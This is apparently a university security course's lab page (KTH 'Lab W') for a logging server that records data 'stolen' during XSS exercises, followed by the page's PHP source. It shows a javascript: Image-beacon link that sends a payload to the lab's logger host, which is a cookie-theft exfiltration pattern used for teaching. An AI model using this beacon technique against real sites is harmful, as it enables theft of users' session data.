Lab W - Log Script

You can use this server side script to store automated log data from client-side JavaScript. For example, clicking this client-side hyperlink will cause data to be stored on our web server (dasak.csc.kth.se). It will be accessible here.

javascript:void((new Image()).src='http://dasak-vm-lab-server.eecs.kth.se/logger/log.php?' + 'to=' + '&payload=' + '&random=' + Math.random());

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding. The void(...); construct prevents the browser from navigating to a new page consisting of the contents of the expression (which is what it normally does when it encounters a non-void expression like javascript:2+2).

Test form

If you just want to try out the script, you can use this form. (For the programming project, you'll probably want to use the JavaScript image technique shown above.)

To: (your personal alias to be able to find your entry in the log atferwards)

Payload: (the information you stole)

Source code

In case you are curious, here is the source code of this page.

<?php //$from = "zoobar@dasak.csc.kth.se"; $to = $_GET['to'] ? $_GET['to'] : ""; $to = filter_var($to, FILTER_SANITIZE_STRING); $payload = $_GET['payload'] ? $_GET['payload'] : ""; $payload = filter_var($payload, FILTER_SANITIZE_STRING); $filelog = "/tmp/getdasakzoobarlogfile.txt"; ?> <!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab W - Log Script</title> </head> <body> <h1>Lab W - Log Script</h1> <p>You can use this server side script to store automated log data from client-side JavaScript. For example, clicking this client-side hyperlink will cause data to be stored on our web server (dasak.csc.kth.se). It will be accessible <a href="/logger/print.php">here</a>. </p> <pre class="tty"><?php $link = "javascript:void((new" . " Image()).src=" . "'http://dasak-vm-lab-server.eecs.kth.se/logger/log.php?'" . " + 'to=$to'" . " + '&payload=$payload' + '&random='" . " + Math.random());"; echo "<a href=\"$link\">$link</a>"; ?></pre> <p>The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. Newlines are not allowed in <span style="font-family: monospace;">javascript:</span> links; if this bothers you, try <a href="http://scriptasylum.com/tutorials/encode-decode.html">URL encoding</a>. The <code>void(...);</code> construct prevents the browser from navigating to a new page consisting of the contents of the expression (which is what it normally does when it encounters a non-void expression like <code><a href="javascript:2+2">javascript:2+2</a></code>). </p> <h2>Test form</h2> <p>If you just want to try out the script, you can use this form. (For the programming project, you'll probably want to use the JavaScript image technique shown above.)</p> <form method="get"> <div> <b>To:</b> <input name="to" size="40" placeholder="youralias" /><i>(your personal alias to be able to find your entry in the log atferwards) </div> <div> </div> <div> <b>Payload:</b> <input name="payload" placeholder="abcdefg" size="40" /> <i>(the information you stole)</i> </div> <div> <input type="submit" value="Store" name="send_submit" /> <?php if($to) { /* if(!preg_match("/^[a-z0-9_\-\+]+@kth.se$/i", $_REQUEST['to'])) { echo "Please use an @kth.se e-mail address"; } else { */ $fp = fopen($filelog, "a"); // https://www.php.net/manual/en/function.flock.php if (flock($fp, LOCK_EX)) { // acquire an exclusive lock //ftruncate($fp, 0); // truncate file $nowstr = date('Y-m-d H:i:s'); fwrite($fp, "$nowstr ::: $to ::: $payload\n"); fflush($fp); // flush output before releasing the lock flock($fp, LOCK_UN); // release the lock } else { echo "<em>Couldn't get the lock!</em>"; } fclose($fp); echo "<em>Saved!</em>"; /* } */ } ?> </div> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php echo htmlspecialchars(file_get_contents(__FILE__)); ?></pre> </form> </div> </div> </div> </body> </html>